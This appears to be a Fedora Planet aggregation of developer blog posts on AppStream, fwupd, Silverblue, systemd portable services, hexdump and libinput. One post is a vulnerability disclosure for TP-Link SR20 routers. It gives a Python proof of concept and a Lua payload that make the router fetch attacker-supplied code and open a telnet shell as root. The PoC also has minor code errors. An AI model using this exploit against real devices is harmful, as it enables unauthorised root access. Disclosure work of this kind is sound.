Fedora desktop Planet

Remember the extra metadata if you change a desktop ID!

Posted by Richard Hughes on April 23, 2019 11:48 AM

This is important if you’re the upstream maintainer of an application: If you change the desktop ID then it’s like breaking API. Changing a desktop ID should be done carefully and in a development branch only — and then you need to communicate it and give the distros a chance to adapt to the new name.

If you’re just changing the desktop ID and not forking development, you also need to add something like this in your metainfo.xml file:

  <provides>
    <id>old-name.desktop</id>
  </provides>

GNOME Software gets lots of bugs about showing “duplicate” search results, but there’s no reliable way it can know that calibre-gui.desktop is the same app as com.calibre_ebook.calibre without some help. If you’re a packager building an application for something like Flathub you only need to include the extra provides line if you’re adding a new metainfo.xml file rather than just using rename-appdata-file in the JSON file.

Using a client certificate to set the attestation checksum

Posted by Richard Hughes on April 10, 2019 08:02 PM

For a while, fwupd has been able to verify the PCR0 checksum for the system firmware. The attestation checksum can be used to verify that the installed firmware matches that supplied by the vendor and means the end user is confident the firmware has not been modified by a 3rd party. I think this is really an important and useful thing the LVFS can provide. The PCR0 value can easily be found using tpm2_pcrlist if the TPM is in v2.0 mode, or cat /sys/class/tpm/tpm0/pcrs if the TPM is still in v1.2 mode. It is also reported in the fwupdmgr get-devices output for versions of fwupd >= 1.2.2.

The device checksum as a PCR0 is slightly different than a device checksum for a typical firmware. For instance, a DFU device checksum can be created using sha256sum firmware.bin (assuming the image is 100% filling the device) and you don’t actually have to flash the image to the hardware to get the device checksum out. For a UEFI UpdateCapsule you need to schedule the update, reboot, then read back the PCR0 from the hardware. There must be an easier way…

Assuming you have a vendor account on the LVFS, first upload the client certificate for your user account to the LVFS:

Then, assuming you’re using fwupd >= 1.2.6 you can now do this:

fwupdmgr refresh
fwupdmgr update
…reboot…
fwupdmgr report-history --sign

Notice the –sign there? Looking back at the LVFS, there now exists a device checksum:

This means the firmware gets the magic extra green tick that makes everyone feel a lot happier:

Developer tool for i18n: “Pseudolocale”

Posted by Bastien Nocera on April 06, 2019 10:41 AM
While browsing for some internationalisation/localisation features, I found an interesting piece of functionality in Android's developer documentation. I'll quote it here:
A pseudolocale is a locale that is designed to simulate characteristics of languages that cause UI, layout, and other translation-related problems when an app is translated.
I've now implemented this for applications and libraries that use gettext, as an LD_PRELOAD library, available from this repository.


The current implementation can highlight a number of potential problems (paraphrasing the Android documentation again):
- String concatenation, which displays as one message split across 2 or more brackets.
- Hard-coded strings, which cannot be sent to translation, display as unaccented text in the pseudolocale to make them easy to notice.
- Right-to-left (RTL) problems such as elements not being mirrored.

Our old friend, Office Runner 


Testing brought some unexpected results :)

Silverblue at 1

Posted by Matthias Clasen on April 03, 2019 05:53 PM

It has been a bit more than a year that we’ve set up the Atomic Workstation SIG. A little later,  we settled on the name Silverblue, and did a preview release with Fedora 29.

The recent F30 beta release is an good opportunity to look back. What have we achieved?

When we set out to turn Atomic Workstation into an every-day-usable desktop, we had a list of items that we knew needed to be addressed. As it turns out, we have solved most of them, or are very close to that.

Here is an unsorted list.

Full Flatpak support

GNOME Software already had support for installing Flatpaks, a year ago, so this is not 100% new. But the support has been greatly improved with the port to libflatpak – GNOME Software is now using the same code as the Flatpak commandline. And  more recently, it learned to display information about sandbox permissions, so that users can see what level of system access the installed applications have.

This information is now also available in the new Application Settings panel. The panel also offers some control over permissions and lets you clean up storage per application.

A Flatpak registry

Flathub is a great place to find desktop applications – there are over 500 now. But since we can’t enable Flathub by default, we have looked for an alternative, and started to provide Flatpak apps in the Fedora container registry. This is taking advantage of Flatpaks support for the OCI format, and uses the Fedora module-build-system.

GNOME Software support for rpm-ostree

GNOME Software was designed as an application installer, but it also provides the UI for OS updates and upgrades. On a Silverblue system, that means supporting rpm-ostree. GNOME Software has learned to do this.

Another bit of functionality for which GNOME Software was traditionally talking to PackageKit is Addons. These are things that could be classified as system extensions: fonts, language support, shell extensions,, etc.  On a Silverblue system, the direct replacement is to use the rpm-ostree layering capability to add such packages to the OS image. GNOME Software knows how to do this now. It is not ideal, since you probably don’t expect to have to reboot your system for installing a font. But it gets us the basic functionality back until we have better solutions for system extensions.

Nvidia driver support

One class of system extensions that I haven’t mention in the previous section is drivers.  If you have an Nvidia graphics card, you may want the Nvidia driver to make best use of your hardware.  The situation with the Nvidia drivers is a little more complicated than with plain rpms, since the rpm needs to match your kernel, and if you don’t have the right driver, your system may boot to a black screen.

These complications are not unique to Silverblue, and the traditional solution for this in Fedora is to use the akmod system to build drivers that match your kernel. With Fedora 30, we put the necessary changes in place in rpm-ostree and the OS image to make this work for Silverblue as well.

Third-party rpms

Fedora contains a lot of apps, but there’s always the odd one that you can’t find in the repositories. A popular app in this category is the Chrome browser. Thankfully, Google provides an rpm that works on Fedora. But, it installs its content into /opt. That is not technically wrong, but causes a problem on Silverblue, since rpm-ostree has so far insisted on keeping packaged content under its tight control in /usr.

Ultimatively, we  want to see apps shipped as Flatpaks, but for Fedora 30, we have managed to get rpm-ostree to handle this situation, so chrome and similar 3rd party rpms can now be installed via package layering on Silverblue.

A toolbox

An important target audience for Fedora Workstation is developers. Not being able to install toolchains and libraries (because the OS is immutable) is obviously not going to make this audience happy.

The short answer is: switch to container-based workflows. Its the future!

But that doesn’t excuse us  from making these workflows easy and convenient for people who are used to the power of the commandline. So, we had to come up with a better answer, and started to develop the toolbox. The toolbox is a commandline tool to take the pain out of working with ‘pet’ containers. With a single command,

toolbox enter

it gives you a ‘traditional’ Fedora environment with dnf,  where you can install the packages you need. The toolbox has the infrastructure to manage multiple named containers, so you can work on different projects in parallel without interference.

Whats missing?

There are many bigger and smaller things that can still be improved – software is never finished. To name just a few:

  • Make IDEs work well with containers on an immutable OS
  • Codec availability and installation
  • Handle “difficult” applications such as virtualbox well
  • Find better ways to handle system extensions

But we’ve come a long way in the one year since I’ve started using Atomic Workstation as my day-to-day OS.

If you want to see for yourself, download the F30 beta image and give it a try!

Walkthrough for Portable Services in Go

Posted by Lennart Poettering on April 02, 2019 10:00 PM

Portable Services Walkthrough (Go Edition)

A few months ago I posted a blog story with a walkthrough of systemd Portable Services. The example service given was written in C, and the image was built with mkosi. In this blog story I'd like to revisit the exercise, but this time focus on a different aspect: modern programming languages like Go and Rust push users a lot more towards static linking of libraries than the usual dynamic linking preferred by C (at least in the way C is used by traditional Linux distributions).

Static linking means we can greatly simplify image building: if we don't have to link against shared libraries during runtime we don't have to include them in the portable service image. And that means pretty much all need for building an image from a Linux distribution of some kind goes away as we'll have next to no dependencies that would require us to rely on a distribution package manager or distribution packages. In fact, as it turns out, we only need as few as three files in the portable service image to be fully functional.

So, let's have a closer look how such an image can be put together. All of the following is available in this git repository.

A Simple Go Service

Let's start with a simple Go service, an HTTP service that simply counts how often a page from it is requested. Here are the sources: main.go — note that I am not a seasoned Go programmer, hence please be gracious.

The service implements systemd's socket activation protocol, and thus can receive bound TCP listener sockets from systemd, using the $LISTEN_PID and $LISTEN_FDS environment variables.

The service will store the counter data in the directory indicated in the $STATE_DIRECTORY environment variable, which happens to be an environment variable current systemd versions set based on the StateDirectory= setting in service files.

Two Simple Unit Files

When a service shall be managed by systemd a unit file is required. Since the service we are putting together shall be socket activatable, we even have two: portable-walkthrough-go.service (the description of the service binary itself) and portable-walkthrough-go.socket (the description of the sockets to listen on for the service).

These units are not particularly remarkable: the .service file primarily contains the command line to invoke and a StateDirectory= setting to make sure the service when invoked gets its own private state directory under /var/lib/ (and the $STATE_DIRECTORY environment variable is set to the resulting path). The .socket file simply lists 8080 as TCP/IP port to listen on.

An OS Description File

OS images (and that includes portable service images) generally should include an os-release file. Usually, that is provided by the distribution. Since we are building an image without any distribution let's write our own version of such a file. Later on we can use the portablectl inspect command to have a look at this metadata of our image.

Putting it All Together

The four files described above are already every file we need to build our image. Let's now put the portable service image together. For that I've written a Makefile. It contains two relevant rules: the first one builds the static binary from the Go program sources. The second one then puts together a squashfs file system combining the following:

  1. The compiled, statically linked service binary
  2. The two systemd unit files
  3. The os-release file
  4. A couple of empty directories such as /proc/, /sys/, /dev/ and so on that need to be over-mounted with the respective kernel API file system. We need to create them as empty directories here since Linux insists on directories to exist in order to over-mount them, and since the image we are building is going to be an immutable read-only image (squashfs) these directories cannot be created dynamically when the portable image is mounted.
  5. Two empty files /etc/resolv.conf and /etc/machine-id that can be over-mounted with the same files from the host.

And that's already it. After a quick make we'll have our portable service image portable-walkthrough-go.raw and are ready to go.

Trying it out

Let's now attach the portable service image to our host system:

# portablectl attach ./portable-walkthrough-go.raw
(Matching unit files with prefix 'portable-walkthrough-go'.)
Created directory /etc/systemd/system.attached.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.socket.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Created symlink /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf → /usr/lib/systemd/portable/profile/default/service.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.service.
Created symlink /etc/portables/portable-walkthrough-go.raw → /home/lennart/projects/portable-walkthrough-go/portable-walkthrough-go.raw.

The portable service image is now attached to the host, which means we can now go and start it (or even enable it):

# systemctl start portable-walkthrough-go.socket

Let's see if our little web service works, by doing an HTTP request on port 8080:

# curl localhost:8080
Hello! You are visitor #1!

Let's try this again, to check if it counts correctly:

# curl localhost:8080
Hello! You are visitor #2!

Nice! It worked. Let's now stop the service again, and detach the image again:

# systemctl stop portable-walkthrough-go.service portable-walkthrough-go.socket
# portablectl detach portable-walkthrough-go
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Removed /etc/portables/portable-walkthrough-go.raw.
Removed /etc/systemd/system.attached.

And there we go, the portable image file is detached from the host again.

A Couple of Notes

  1. Of course, this is a simplistic example: in real life services will be more than one compiled file, even when statically linked. But you get the idea, and it's very easy to extend the example above to include any additional, auxiliary files in the portable service image.

  2. The service is very nicely sandboxed during runtime: while it runs as regular service on the host (and you thus can watch its logs or do resource management on it like you would do for all other systemd services), it runs in a very restricted environment under a dynamically assigned UID that ceases to exist when the service is stopped again.

  3. Originally I wanted to make the service not only socket activatable but also implement exit-on-idle, i.e. add a logic so that the service terminates on its own when there's no ongoing HTTP connection for a while. I couldn't figure out how to do this race-freely in Go though, but I am sure an interested reader might want to add that? By combining socket activation with exit-on-idle we can turn this project into an excercise of putting together an extremely resource-friendly and robust service architecture: the service is started only when needed and terminates when no longer needed. This would allow to pack services at a much higher density even on systems with few resources.

  4. While the basic concepts of portable services have been around since systemd 239, it's best to try the above with systemd 241 or newer since the portable service logic received a number of fixes since then.

Further Reading

A low-level document introducing Portable Services is shipped along with systemd.

Please have a look at the blog story from a few months ago that did something very similar with a service written in C.

There are also relevant manual pages: portablectl(1) and systemd-portabled(8).

Remote code execution as root from the local network on TP-Link SR20 routers

Posted by Matthew Garrett on March 28, 2019 10:18 PM
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comment count unavailable comments

New AppStream Validation Requirements

Posted by Richard Hughes on March 28, 2019 04:27 PM

In the next release of appstream-glib the appstream-util validate requirements got changed, which might make your life easier, or harder — depending if you already pass or fail the validation. The details are here but the rough jist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo
$ flatpak install gnome-nightly org.gnome.Sdk
$ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master
# appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in
# exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

The LVFS is now a Linux Foundation project

Posted by Richard Hughes on March 28, 2019 02:19 PM

The LVFS is now an official Linux Foundation project! I did a mini-interview if you want some more details about where the project came from and where it’s heading. I’m hoping the move to the Linux Foundation gives the project a lot more credibility with existing LF members, and it certainly takes some of the load from me. I’ll continue to develop the lvfs-website codebase as before, and still be the friendly face when talking to OEMs and ODMs.

In the short term, not much changes, although you might start see some rebranding of the website itself. The server is also moving from a little VM in AMS to a fully scalable orchestrated thing maintained by people who actually understand how to be a sysadmin. If you’re interested in what’s happening on the LVFS, be sure to join the announcement mailing list. We’re averaging about 450,000 firmware downloads a month, and still growing steadily, with more and more vendors joining every month.

In related news, there’s lots of new firmware on the LVFS, much of it addressing serious CVEs on lots of different laptop models. If you’ve not updated recently, now is the time to fix that.

Even more fun with SuperIO

Posted by Richard Hughes on March 25, 2019 11:35 AM

My fun with SuperIO continues, and may be at the logical end. I’ve now added the required code to the superio plugin to flash IT89xx embedded controllers. Most of the work was working out how to talk to the hardware on ports 0x62 and 0x66, although the flash “commands” are helpfully JEDEC compliant. The actual flashing process is the typical:

  • Enter into a bootloader mode (which disables your keyboard, fans and battery reporting)
  • Mark the internal EEPROM as writable
  • Erase blocks of data
  • Write blocks of data to the device
  • Read back the blocks of data to verify the write
  • Mark the internal EEPROM as read-only
  • Return to runtime mode

There were a few slight hickups, in that when you read the data back from the device just one byte is predictably wrong, but nothing that can’t be worked around in software. Working around the wrong byte means we can verify the attestation checksum correctly.

Now, don’t try flashing your EC with random binaries. The binaries look unsigned, don’t appear to have any kind of checksum, and flashing the wrong binary to the wrong hardware has the failure mode of “no I/O devices appear at boot” so unless you have a hardware programmer handy it’s probably best to wait for an update from your OEM.

We also do the EC update from a special offline-update mode where nothing else than fwupd is running, much like we do the system updates in Fedora. All this work was supported by the people at Star Labs, and now basically everything in the LapTop Mk3 is updatable in Linux. EC updates for Star Labs hardware should appear on the LVFS soon.

Using hexdump to print binary protocols

Posted by Peter Hutterer on March 21, 2019 12:30 AM

I had to work on an image yesterday where I couldn't install anything and the amount of pre-installed tools was quite limited. And I needed to debug an input device, usually done with libinput record. So eventually I found that hexdump supports formatting of the input bytes but it took me a while to figure out the right combination. The various resources online only got me partway there. So here's an explanation which should get you to your results quickly.

By default, hexdump prints identical input lines as a single line with an asterisk ('*'). To avoid this, use the -v flag as in the examples below.

hexdump's format string is single-quote-enclosed string that contains the count, element size and double-quote-enclosed printf-like format string. So a simple example is this:


$ hexdump -v -e '1/2 "%d\n"' <filename>
-11643
23698
0
0
-5013
6
0
0
This prints 1 element ('iteration') of 2 bytes as integer, followed by a linebreak. Or in other words: it takes two bytes, converts it to int and prints it. If you want to print the same input value in multiple formats, use multiple -e invocations.

$ hexdump -v -e '1/2 "%d "' -e '1/2 "%x\n"' <filename>
-11568 d2d0
23698 5c92
0 0
0 0
6355 18d3
1 1
0 0
This prints the same 2-byte input value, once as decimal signed integer, once as lowercase hex. If we have multiple identical things to print, we can do this:

$ hexdump -v -e '2/2 "%6d "' -e '" hex:"' -e '4/1 " %x"' -e '"\n"'
-10922 23698 hex: 56 d5 92 5c
0 0 hex: 0 0 0 0
14879 1 hex: 1f 3a 1 0
0 0 hex: 0 0 0 0
0 0 hex: 0 0 0 0
0 0 hex: 0 0 0 0
Which prints two elements, each size 2 as integers, then the same elements as four 1-byte hex values, followed by a linebreak. %6d is a standard printf instruction and documented in the manual.

Let's go and print our protocol. The struct representing the protocol is this one:


struct input_event {
#if (__BITS_PER_LONG != 32 || !defined(__USE_TIME_BITS64)) && !defined(__KERNEL__)
struct timeval time;
#define input_event_sec time.tv_sec
#define input_event_usec time.tv_usec
#else
__kernel_ulong_t __sec;
#if defined(__sparc__) && defined(__arch64__)
unsigned int __usec;
#else
__kernel_ulong_t __usec;
#endif
#define input_event_sec __sec
#define input_event_usec __usec
#endif
__u16 type;
__u16 code;
__s32 value;
};
So we have two longs for sec and usec, two shorts for type and code and one signed 32-bit int. Let's print it:

$ hexdump -v -e '"E: " 1/8 "%u." 1/8 "%06u" 2/2 " %04x" 1/4 "%5d\n"' /dev/input/event22
E: 1553127085.097503 0002 0000 1
E: 1553127085.097503 0002 0001 -1
E: 1553127085.097503 0000 0000 0
E: 1553127085.097542 0002 0001 -2
E: 1553127085.097542 0000 0000 0
E: 1553127085.108741 0002 0001 -4
E: 1553127085.108741 0000 0000 0
E: 1553127085.118211 0002 0000 2
E: 1553127085.118211 0002 0001 -10
E: 1553127085.118211 0000 0000 0
E: 1553127085.128245 0002 0000 1
And voila, we have our structs printed in the same format evemu-record prints out. So with nothing but hexdump, I can generate output I can then parse with my existing scripts on another box.

libinput's internal building blocks

Posted by Peter Hutterer on March 15, 2019 06:15 AM

Ho ho ho, let's write libinput. No, of course I'm not serious, because no-one in their right mind would utter "ho ho ho" without a sufficient backdrop of reindeers to keep them sane. So what this post is instead is me writing a nonworking fake libinput in Python, for the sole purpose of explaining roughly how libinput's architecture looks like. It'll be to the libinput what a Duplo car is to a Maserati. Four wheels and something to entertain the kids with but the queue outside the nightclub won't be impressed.

The target audience are those that need to hack on libinput and where the balance of understanding vs total confusion is still shifted towards the latter. So in order to make it easier to associate various bits, here's a description of the main building blocks.

libinput uses something resembling OOP except that in C you can't have nice things unless what you want is a buffer overflow\n\80xb1001af81a2b1101. Instead, we use opaque structs, each with accessor methods and an unhealthy amount of verbosity. Because Python does have classes, those structs are represented as classes below. This all won't be actual working Python code, I'm just using the syntax.

Let's get started. First of all, let's create our library interface.


class Libinput:
@classmethod
def path_create_context(cls):
return _LibinputPathContext()

@classmethod
def udev_create_context(cls):
return _LibinputUdevContext()

# dispatch() means: read from all our internal fds and
# call the dispatch method on anything that has changed
def dispatch(self):
for fd in self.epoll_fd.get_changed_fds():
self.handlers[fd].dispatch()

# return whatever the next event is
def get_event(self):
return self._events.pop(0)

# the various _notify functions are internal API
# to pass things up to the context
def _notify_device_added(self, device):
self._events.append(LibinputEventDevice(device))
self._devices.append(device)

def _notify_device_removed(self, device):
self._events.append(LibinputEventDevice(device))
self._devices.remove(device)

def _notify_pointer_motion(self, x, y):
self._events.append(LibinputEventPointer(x, y))



class _LibinputPathContext(Libinput):
def add_device(self, device_node):
device = LibinputDevice(device_node)
self._notify_device_added(device)

def remove_device(self, device_node):
self._notify_device_removed(device)


class _LibinputUdevContext(Libinput):
def __init__(self):
self.udev = udev.context()

def udev_assign_seat(self, seat_id):
self.seat_id = seat.id

for udev_device in self.udev.devices():
device = LibinputDevice(udev_device.device_node)
self._notify_device_added(device)


We have two different modes of initialisation, udev and path. The udev interface is used by Wayland compositors and adds all devices on the given udev seat. The path interface is used by the X.Org driver and adds only one specific device at a time. Both interfaces have the dispatch() and get_events() methods which is how every caller gets events out of libinput.

In both cases we create a libinput device from the data and create an event about the new device that bubbles up into the event queue.

But what really are events? Are they real or just a fidget spinner of our imagination? Well, they're just another object in libinput.


class LibinputEvent:
@property
def type(self):
return self._type

@property
def context(self):
return self._libinput

@property
def device(self):
return self._device

def get_pointer_event(self):
if instanceof(self, LibinputEventPointer):
return self # This makes more sense in C where it's a typecast
return None

def get_keyboard_event(self):
if instanceof(self, LibinputEventKeyboard):
return self # This makes more sense in C where it's a typecast
return None


class LibinputEventPointer(LibinputEvent):
@property
def time(self)
return self._time/1000

@property
def time_usec(self)
return self._time

@property
def dx(self)
return self._dx

@property
def absolute_x(self):
return self._x * self._x_units_per_mm

@property
def absolute_x_transformed(self, width):
return self._x * width/ self._x_max_value
You get the gist. Each event is actually an event of a subtype with a few common shared fields and a bunch of type-specific ones. The events often contain some internal value that is calculated on request. For example, the API for the absolute x/y values returns mm, but we store the value in device units instead and convert to mm on request.

So, what's a device then? Well, just another I-cant-believe-this-is-not-a-class with relatively few surprises:


class LibinputDevice:
class Capability(Enum):
CAP_KEYBOARD = 0
CAP_POINTER = 1
CAP_TOUCH = 2
...

def __init__(self, device_node):
pass # no-one instantiates this directly

@property
def name(self):
return self._name

@property
def context(self):
return self._libinput_context

@property
def udev_device(self):
return self._udev_device

@property
def has_capability(self, cap):
return cap in self._capabilities

...
Now we have most of the frontend API in place and you start to see a pattern. This is how all of libinput's API works, you get some opaque read-only objects with a few getters and accessor functions.

Now let's figure out how to work on the backend. For that, we need something that handles events:


class EvdevDevice(LibinputDevice):
def __init__(self, device_node):
fd = open(device_node)
super().context.add_fd_to_epoll(fd, self.dispatch)
self.initialize_quirks()

def has_quirk(self, quirk):
return quirk in self.quirks

def dispatch(self):
while True:
data = fd.read(input_event_byte_count)
if not data:
break

self.interface.dispatch_one_event(data)

def _configure(self):
# some devices are adjusted for quirks before we
# do anything with them
if self.has_quirk(SOME_QUIRK_NAME):
self.libevdev.disable(libevdev.EV_KEY.BTN_TOUCH)


if 'ID_INPUT_TOUCHPAD' in self.udev_device.properties:
self.interface = EvdevTouchpad()
elif 'ID_INPUT_SWITCH' in self.udev_device.properties:
self.interface = EvdevSwitch()
...
else:
self.interface = EvdevFalback()


class EvdevInterface:
def dispatch_one_event(self, event):
pass

class EvdevTouchpad(EvdevInterface):
def dispatch_one_event(self, event):
...

class EvdevTablet(EvdevInterface):
def dispatch_one_event(self, event):
...


class EvdevSwitch(EvdevInterface):
def dispatch_one_event(self, event):
...

class EvdevFallback(EvdevInterface):
def dispatch_one_event(self, event):
...
Our evdev device is actually a subclass (well, C, *handwave*) of the public device and its main function is "read things off the device node". And it passes that on to a magical interface. Other than that, it's a collection of generic functions that apply to all devices. The interfaces is where most of the real work is done.

The interface is decided on by the udev type and is where the device-specifics happen. The touchpad interface deals with touchpads, the tablet and switch interface with those devices and the fallback interface is that for mice, keyboards and touch devices (i.e. the simple devices).

Each interface has very device-specific event processing and can be compared to the Xorg synaptics vs wacom vs evdev drivers. If you are fixing a touchpad bug, chances are you only need to care about the touchpad interface.

The device quirks used above are another simple block:


class Quirks:
def __init__(self):
self.read_all_ini_files_from_directory('$PREFIX/share/libinput')

def has_quirk(device, quirk):
for file in self.quirks:
if quirk.has_match(device.name) or
quirk.has_match(device.usbid) or
quirk.has_match(device.dmi):
return True
return False

def get_quirk_value(device, quirk):
if not self.has_quirk(device, quirk):
return None

quirk = self.lookup_quirk(device, quirk)
if quirk.type == "boolean":
return bool(quirk.value)
if quirk.type == "string":
return str(quirk.value)
...
A system that reads a bunch of .ini files, caches them and returns their value on demand. Those quirks are then used to adjust device behaviour at runtime.

The next building block is the "filter" code, which is the word we use for pointer acceleration. Here too we have a two-layer abstraction with an interface.


class Filter:
def dispatch(self, x, y):
# converts device-unit x/y into normalized units
return self.interface.dispatch(x, y)

# the 'accel speed' configuration value
def set_speed(self, speed):
return self.interface.set_speed(speed)

# the 'accel speed' configuration value
def get_speed(self):
return self.speed

...


class FilterInterface:
def dispatch(self, x, y):
pass

class FilterInterfaceTouchpad:
def dispatch(self, x, y):
...

class FilterInterfaceTrackpoint:
def dispatch(self, x, y):
...

class FilterInterfaceMouse:
def dispatch(self, x, y):
self.history.push((x, y))
v = self.calculate_velocity()
f = self.calculate_factor(v)
return (x * f, y * f)

def calculate_velocity(self)
for delta in self.history:
total += delta
velocity = total/timestamp # as illustration only

def calculate_factor(self, v):
# this is where the interesting bit happens,
# let's assume we have some magic function
f = v * 1234/5678
return f
So libinput calls filter_dispatch on whatever filter is configured and passes the result on to the caller. The setup of those filters is handled in the respective evdev interface, similar to this:

class EvdevFallback:
...
def init_accel(self):
if self.udev_type == 'ID_INPUT_TRACKPOINT':
self.filter = FilterInterfaceTrackpoint()
elif self.udev_type == 'ID_INPUT_TOUCHPAD':
self.filter = FilterInterfaceTouchpad()
...
The advantage of this system is twofold. First, the main libinput code only needs one place where we really care about which acceleration method we have. And second, the acceleration code can be compiled separately for analysis and to generate pretty graphs. See the pointer acceleration docs. Oh, and it also allows us to easily have per-device pointer acceleration methods.

Finally, we have one more building block - configuration options. They're a bit different in that they're all similar-ish but only to make switching from one to the next a bit easier.


class DeviceConfigTap:
def set_enabled(self, enabled):
self._enabled = enabled

def get_enabled(self):
return self._enabled

def get_default(self):
return False

class DeviceConfigCalibration:
def set_matrix(self, matrix):
self._matrix = matrix

def get_matrix(self):
return self._matrix

def get_default(self):
return [1, 0, 0, 0, 1, 0, 0, 0, 1]
And then the devices that need one of those slot them into the right pointer in their structs:

class EvdevFallback:
...
def init_calibration(self):
self.config_calibration = DeviceConfigCalibration()
...

def handle_touch(self, x, y):
if self.config_calibration is not None:
matrix = self.config_calibration.get_matrix

x, y = matrix.multiply(x, y)
self.context._notify_pointer_abs(x, y)

And that's basically it, those are the building blocks libinput has. The rest is detail. Lots of it, but if you understand the architecture outline above, you're most of the way there in diving into the details.

libinput and location-based touch arbitration

Posted by Peter Hutterer on March 15, 2019 05:58 AM

